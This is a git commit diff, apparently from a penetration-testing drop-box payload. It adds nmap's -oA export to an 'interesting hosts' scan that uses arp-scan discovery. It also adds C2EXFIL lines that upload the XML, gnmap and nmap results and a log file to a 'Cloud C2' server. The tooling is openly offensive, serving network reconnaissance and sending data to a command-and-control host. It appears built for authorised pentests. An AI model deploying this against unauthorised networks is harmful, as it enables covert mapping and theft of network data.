Adding nmaps -oA option to interessting hosts scan (#48)
Adding the -oA option of nmap to export results in useful formats and upload them to the C2 Cloud. For further use in a pentest.pull/51/head
parent
5e6bbc86d3
commit
b4340761ba
|
@ -423,6 +423,8 @@ function GRAB_NMAP_LOOT() {
|
||||||
function GRAB_NMAP_INTERESTING_HOSTS_LOOT() {
|
function GRAB_NMAP_INTERESTING_HOSTS_LOOT() {
|
||||||
if [ "$GRAB_NMAP_INTERESTING_HOSTS_LOOT" = "true" ]; then
|
if [ "$GRAB_NMAP_INTERESTING_HOSTS_LOOT" = "true" ]; then
|
||||||
NMAP_INTERESTING_HOSTS_LOOT_FILE=$LOOT_DIR/nmap_interesting_hosts.txt
|
NMAP_INTERESTING_HOSTS_LOOT_FILE=$LOOT_DIR/nmap_interesting_hosts.txt
|
||||||
|
### Adding -oA nmap option to scan option
|
||||||
|
NMAP_OPTIONS_INTERESTING_HOSTS="${NMAP_OPTIONS_INTERESTING_HOSTS} -oA ${LOOT_DIR}/nmap-${SCAN_COUNT}-${TODAY}"
|
||||||
touch $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
touch $NMAP_INTERESTING_HOSTS_LOOT_FILE
|
||||||
INTERESTING_HOSTS=( $(arp-scan --localnet | egrep $INTERESTING_HOSTS_PATTERN | awk {'print $1'} | awk '{print}' ORS='\t' | sed 's/.$//') )
|
INTERESTING_HOSTS=( $(arp-scan --localnet | egrep $INTERESTING_HOSTS_PATTERN | awk {'print $1'} | awk '{print}' ORS='\t' | sed 's/.$//') )
|
||||||
INTERESTING_HOSTS+=( $(ip r | grep default | cut -d ' ' -f 3) )
|
INTERESTING_HOSTS+=( $(ip r | grep default | cut -d ' ' -f 3) )
|
||||||
|
@ -479,10 +481,37 @@ function EXFIL_TO_CLOUD_C2() {
|
||||||
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
done
|
done
|
||||||
|
### Add exfiltration of nmap -oA files
|
||||||
|
## XML
|
||||||
|
LOOT_FILES="$LOOT_DIR/*.xml"
|
||||||
|
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
|
||||||
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
|
||||||
|
## GNMAP
|
||||||
|
LOOT_FILES="$LOOT_DIR/*.gnmap"
|
||||||
|
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
|
||||||
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
|
||||||
|
## NMAP
|
||||||
|
LOOT_FILES="$LOOT_DIR/*.nmap"
|
||||||
|
LOOT_FILE="${LOOT_FILES}" #just one file so no loop
|
||||||
|
LOOT_FILE_DESC=${LOOT_FILE/"$LOOT_DIR/"/}
|
||||||
|
LOOT_FILE_DESC=$SCAN_COUNT-$TODAY-${LOOT_FILE_DESC%.*}-loot
|
||||||
|
LOOT_FILE_DESC=${LOOT_FILE_DESC^^}
|
||||||
|
C2EXFIL STRING $LOOT_FILE $LOOT_FILE_DESC && echo "Exfiltration of $LOOT_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
|
|
||||||
|
### Exfiltrate log file
|
||||||
LOG_FILE_DESC=$SCAN_COUNT-$TODAY-LOGFILE
|
LOG_FILE_DESC=$SCAN_COUNT-$TODAY-LOGFILE
|
||||||
C2EXFIL STRING $LOG_FILE $LOG_FILE_DESC && echo "Exfiltration of $LOG_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOG_FILE to Cloud C2 has failed" >> $LOG_FILE
|
C2EXFIL STRING $LOG_FILE $LOG_FILE_DESC && echo "Exfiltration of $LOG_FILE to Cloud C2 has passed" >> $LOG_FILE || echo "Exfiltration of $LOG_FILE to Cloud C2 has failed" >> $LOG_FILE
|
||||||
else
|
else
|
||||||
echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed, CC-CLIENT seems not to be running" >> $LOG_FILE
|
echo "Exfiltration of $LOOT_FILE to Cloud C2 has failed, CC-CLIENT seems not to be running" >> $LOG_FILE
|
||||||
|
|
||||||
fi
|
fi
|
||||||
fi
|
fi
|
||||||
return
|
return
|
||||||
|
|
Loading…
Reference in New Issue